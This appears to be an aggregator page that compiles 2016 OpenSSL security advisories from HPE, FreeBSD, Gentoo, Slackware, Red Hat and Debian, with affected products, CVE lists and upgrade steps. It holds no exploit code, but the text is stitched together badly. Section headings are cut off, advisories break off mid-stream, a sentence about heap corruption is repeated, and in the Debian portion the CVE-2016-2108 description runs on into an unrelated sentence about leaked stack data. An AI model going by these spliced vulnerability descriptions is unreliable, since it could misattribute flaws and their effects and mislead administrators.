7900 (Comware 7) - Version: R2152
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
5130 (Comware 7) - Version: R3115
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
6125XLG - Version: R2422P02
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
6127XLG - Version: R2422P02
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
Moonshot - Version: R2432
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
5700 (Comware 7) - Version: R2422P02
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
5930 (Comware 7) - Version: R2422P02
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
1950 (Comware 7) - Version: R3115
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
7500 (Comware 7) - Version: R7184
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
5510HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
5130HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
5940 - Version: R2509
- HP Network Products
- JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch
- JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch
- JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch
- JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch
- JH396A HPE FlexFabric 5940 32QSFP+ Switch
- JH397A HPE FlexFabric 5940 2-slot Switch
- JH398A HPE FlexFabric 5940 4-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
5950 - Version: R6123
- HP Network Products
- JH321A HPE FlexFabric 5950 32QSFP28 Switch
- JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch
- JH404A HPE FlexFabric 5950 4-slot Switch
12900E (Comware 7) - Version: R2609
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176

iMC Products

iNode PC 7.2 (E0410) - Version: 7.2 E0410
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176

VCX Products

VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176

Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.

HISTORY Version:1 (rev.1) - 2 June 2017 Initial release

Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . Background

FreeBSD includes software from the OpenSSL Project.

II. Problem Description

The padding check in AES-NI CBC MAC was rewritten to be in constant time by making sure that always the same bytes are read and compared against either the MAC or padding bytes. But it no longer checked that there was enough data to have both the MAC and padding bytes. [CVE-2016-2107]

An overflow can occur in the EVP_EncodeUpdate() function which is used for Base64 encoding of binary data. [CVE-2016-2105]

An overflow can occur in the EVP_EncryptUpdate() function, however it is believed that there can be no overflows in internal code due to this problem. [CVE-2016-2109]

ASN1 Strings that are over 1024 bytes can cause an overread in applications using the X509_NAME_oneline() function on EBCDIC systems. [CVE-2016-2176] FreeBSD does not run on any EBCDIC systems and therefore is not affected.

III. [CVE-2016-2109] TLS applications are not affected.

IV. Workaround

No workaround is available.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

Restart all daemons that use the library, or reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

freebsd-update fetch

freebsd-update install

Restart all daemons that use the library, or reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 10.x]

fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch

fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch.asc

gpg --verify openssl-10.patch.asc

[FreeBSD 9.3]

fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patc

fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patch.asc

gpg --verify openssl-9.patch.asc

b) Apply the patch. Execute the following commands as root:

cd /usr/src

patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as described in .

Restart all daemons that use the library, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path Revision

stable/9/ r299053 releng/9.3/ r299068 stable/10/ r298999 releng/10.1/ r299068 releng/10.2/ r299067 releng/10.3/ r299066

To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:

svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

VII.

Gentoo Linux Security Advisory GLSA 201612-16

                                       https://security.gentoo.org/

Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 07, 2016 Bugs: #581234, #585142, #585276, #591454, #592068, #592074, #592082, #594500, #595186 ID: 201612-16

Synopsis

Multiple vulnerabilities have been found in OpenSSL, the worst of which allows attackers to conduct a time based side-channel attack.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 dev-libs/openssl < 1.0.2j >= 1.0.2j

Description

Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers and the International Association for Cryptologic Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really are Constant-Time" for further details. Additionally, a time based side-channel attack may allow a local attacker to recover a private DSA key.

Resolution

All OpenSSL users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"

References

[ 1 ] CVE-2016-2105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105 [ 2 ] CVE-2016-2106 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106 [ 3 ] CVE-2016-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107 [ 4 ] CVE-2016-2108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108 [ 5 ] CVE-2016-2109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109 [ 6 ] CVE-2016-2176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176 [ 7 ] CVE-2016-2177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177 [ 8 ] CVE-2016-2178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178 [ 9 ] CVE-2016-2180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180 [ 10 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 11 ] CVE-2016-6304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304 [ 12 ] CVE-2016-6305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305 [ 13 ] CVE-2016-6306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306 [ 14 ] CVE-2016-7052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052 [ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time http://eprint.iacr.org/2016/594.pdf

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201612-16

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz: Upgraded. +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1t-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.0.txz

Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1t-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz

Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz

Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1t-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz

Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2h-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2h-i586-1.txz

Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2h-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2h-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 14.0 packages: 033bd9509aeb07712e6bb3adf89c18e4 openssl-1.0.1t-i486-1_slack14.0.txz 9e91d781e33f7af80cbad08b245e84ed openssl-solibs-1.0.1t-i486-1_slack14.0.txz

Slackware x86_64 14.0 packages: e5c77ec16e3f2fcb2f1d53d84a6ba951 openssl-1.0.1t-x86_64-1_slack14.0.txz 2de7b6196a905233036d7f38008984bd openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz

Slackware 14.1 packages: 96dcae05ae2f585c30de852a55eb870f openssl-1.0.1t-i486-1_slack14.1.txz 59618b061e62fd9d73ba17df7626b2e7 openssl-solibs-1.0.1t-i486-1_slack14.1.txz

Slackware x86_64 14.1 packages: 3d5ebfce099917703d537ab603e58a9b openssl-1.0.1t-x86_64-1_slack14.1.txz bf3a6bbdbe835dd2ce73333822cc9f06 openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz

Slackware -current packages: 4889a10c5f3aa7104167c7d50eedf7ea a/openssl-solibs-1.0.2h-i586-1.txz 8e3439f35c3cb4e11ca64eebb238a52f n/openssl-1.0.2h-i586-1.txz

Slackware x86_64 -current packages: b4a852bb7e86389ec228288ccb7e79bb a/openssl-solibs-1.0.2h-x86_64-1.txz bcf9dc7bb04173f002644e3ce33ab4ab n/openssl-1.0.2h-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg openssl-1.0.1t-i486-1_slack14.1.txz openssl-solibs-1.0.1t-i486-1_slack14.1.txz

Then, reboot the machine or restart any network services that use OpenSSL.

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

===================================================================== Red Hat Security Advisory

Synopsis: Important: openssl security update Advisory ID: RHSA-2016:0996-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0996.html Issue date: 2016-05-10 CVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2842 =====================================================================

Summary:

An update for openssl is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.

Security Fix(es):

A flaw was found in the way OpenSSL encoded certain ASN.1 data structures. An attacker could use this flaw to create a specially crafted certificate which, when verified or re-encoded by OpenSSL, could cause it to crash, or execute arbitrary code using the permissions of the user running an application compiled against the OpenSSL library. (CVE-2016-2108)
Two integer overflow flaws, leading to buffer overflows, were found in the way the EVP_EncodeUpdate() and EVP_EncryptUpdate() functions of OpenSSL parsed very large amounts of input data. A remote attacker could use these flaws to crash an application using OpenSSL or, possibly, execute arbitrary code with the permissions of the user running that application. (CVE-2016-2105, CVE-2016-2106)
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when the connection used the AES CBC cipher suite and the server supported AES-NI. A remote attacker could possibly use this flaw to retrieve plain text from encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)
Several flaws were found in the way BIO_*printf functions were implemented in OpenSSL. Applications which passed large amounts of untrusted data through these functions could crash or potentially execute code with the permissions of the user running such an application. (CVE-2016-0799, CVE-2016-2842)
A denial of service flaw was found in the way OpenSSL parsed certain ASN.1-encoded data from BIO (OpenSSL's I/O abstraction) inputs. An application using OpenSSL that accepts untrusted ASN.1 BIO input could be forced to allocate an excessive amount of data. (CVE-2016-2109)

Red Hat would like to thank the OpenSSL project for reporting CVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, and CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Böck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as the original reporter of CVE-2016-2107.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.

Bugs fixed (https://bugzilla.redhat.com/):

1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions 1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds 1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data 1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder 1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: openssl-1.0.1e-48.el6_8.1.src.rpm

i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm

x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm

x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: openssl-1.0.1e-48.el6_8.1.src.rpm

x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Red Hat Enterprise Linux Server (v. 6):

Source: openssl-1.0.1e-48.el6_8.1.src.rpm

i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm

ppc64: openssl-1.0.1e-48.el6_8.1.ppc.rpm openssl-1.0.1e-48.el6_8.1.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.1.ppc.rpm openssl-devel-1.0.1e-48.el6_8.1.ppc64.rpm

s390x: openssl-1.0.1e-48.el6_8.1.s390.rpm openssl-1.0.1e-48.el6_8.1.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm openssl-devel-1.0.1e-48.el6_8.1.s390.rpm openssl-devel-1.0.1e-48.el6_8.1.s390x.rpm

x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm

ppc64: openssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.1.ppc64.rpm openssl-static-1.0.1e-48.el6_8.1.ppc64.rpm

s390x: openssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm openssl-perl-1.0.1e-48.el6_8.1.s390x.rpm openssl-static-1.0.1e-48.el6_8.1.s390x.rpm

x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: openssl-1.0.1e-48.el6_8.1.src.rpm

i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm

x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2016-0799 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-2107 https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2109 https://access.redhat.com/security/cve/CVE-2016-2842 https://access.redhat.com/security/updates/classification/#important

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFXMXPXXlSAg2UNWIIRAmqpAJ4sxaxPc4fbLjR32h/PW1fxwOZG7ACgtaSz 6dbI0EemYRoHCDagPHSycq4= =g2Zb -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. This could lead to a heap corruption. This could lead to a heap corruption.

CVE-2016-2108

David Benjamin from Google discovered that two separate bugs in the
ASN.1 encoder, related to handling of negative zero integer values
and large universal tags, could lead to an out-of-bounds write. This could result in arbitrary stack data
being returned in the buffer.

Additional information about these issues can be found in the OpenSSL security advisory at https://www.openssl.org/news/secadv/20160503.txt

For the stable distribution (jessie), these problems have been fixed in version 1.0.1k-3+deb8u5.

For the unstable distribution (sid), these problems have been fixed in version 1.0.2h-1.

We recommend that you upgrade your openssl packages.

References:

CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information
CVE-2016-2106 - OpenSSL, Denial of Service (DoS)
CVE-2016-2109 - OpenSSL, Denial of Service (DoS)
CVE-2016-2105 - OpenSSL, Denial of Service (DoS)
CVE-2016-3739 - cURL and libcurl, Remote code execution
CVE-2016-5388 - "HTTPoxy", Apache Tomcat
CVE-2016-5387 - "HTTPoxy", Apache HTTP Server
